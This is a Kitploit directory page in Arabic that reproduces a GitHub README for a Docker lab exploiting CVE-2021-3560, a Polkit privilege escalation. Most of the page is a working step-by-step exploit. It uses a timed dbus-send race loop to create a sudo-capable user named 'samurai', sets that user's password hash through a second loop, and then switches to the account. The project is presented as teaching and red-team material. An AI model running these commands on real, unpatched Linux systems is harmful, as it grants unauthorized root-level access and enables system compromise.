Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-3560-Polkit-Privilege-Escalation — استغلال قائم على Docker لـ CVE-2021-3560 (تصعيد امتيازات Polkit) مع تعليمات خطوة بخطوة لإنشاء مستخدم sudo عبر حالة سباق في dbus-send. | Kitploit
أدوات/GitHubGitHub/markyu0401/cve-2021-3560-polkit-privilege-escalation
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubmarkyu0401/cve-2021-3560-polkit-privilege-escalation

CVE-2021-3560-Polkit-Privilege-Escalation

استغلال قائم على Docker لـ CVE-2021-3560 (تصعيد امتيازات Polkit) مع تعليمات خطوة بخطوة لإنشاء مستخدم sudo عبر حالة سباق في dbus-send.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 2 سنواتلم تتم المراجعة بعد

CVE-2021-3560-Polkit-Privilege-Escalation

بقلم Mark, Qingchen Yu لبناء الحاوية مع

root@kitploit:~
docker build -t <image tag of your choice> .

لتشغيل الحاوية

root@kitploit:~
docker run -it <image tag name>
  1. ابدأ بـ start.sh

  2. قياس وقت التنفيذ: لاحظ الوقت 'الحقيقي' واحسب نصفه.

    root@kitploit:~
    time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:samurai string:"Samurai" int32:1
    
  3. إنشاء مستخدم بصلاحيات sudo: استبدل X.XXX بنصف الوقت 'الحقيقي' أعلاه لأننا نريد مقاطعة العملية في المنتصف سيتم تشغيل الأمر كحلقة من 10000 مرة قد تحتاج إلى تشغيل هذه الخطوة عدة مرات

    root@kitploit:~
    for counter in {1..10000}; do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:samurai string:"Samurai" int32:1 & sleep X.XXXs; kill $!;done
    
  4. التحقق من إنشاء المستخدم id samurai يجب أن يُظهر أن مستخدم samurai موجود ويُظهر صلاحياته. إذا لم يحدث ذلك، أعد تنفيذ الخطوة 2.

  5. توليد هاش كلمة المرور: في هذه الحالة، ستكون كلمة المرور 'iamsamurai' لاحظ الهاش المُولّد.

    root@kitploit:~
    openssl passwd -5 iamsamurai
    
  6. تعيين كلمة المرور للمستخدم الجديد: استبدل X.XXX بمدة النوم (sleep) واستبدل Password Hash بالهاش من الخطوة 4. استبدل UUUU بمعرّف المستخدم الخاص بـ 'samurai'

    root@kitploit:~
    for counter in {1..10000}; do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/UserUUUU org.freedesktop.Accounts.User.SetPassword string:'Password Hash' string:GoldenEye & sleep X.XXXs; kill $!;done
    
  7. التبديل إلى المستخدم الجديد باستخدام كلمة المرور التي أنشأتها في الخطوة 4. su - samurai

    الآن يجب أن تكون قادراً على استخدام 'sudo مع هذا المستخدم'.

تنزيل الأداة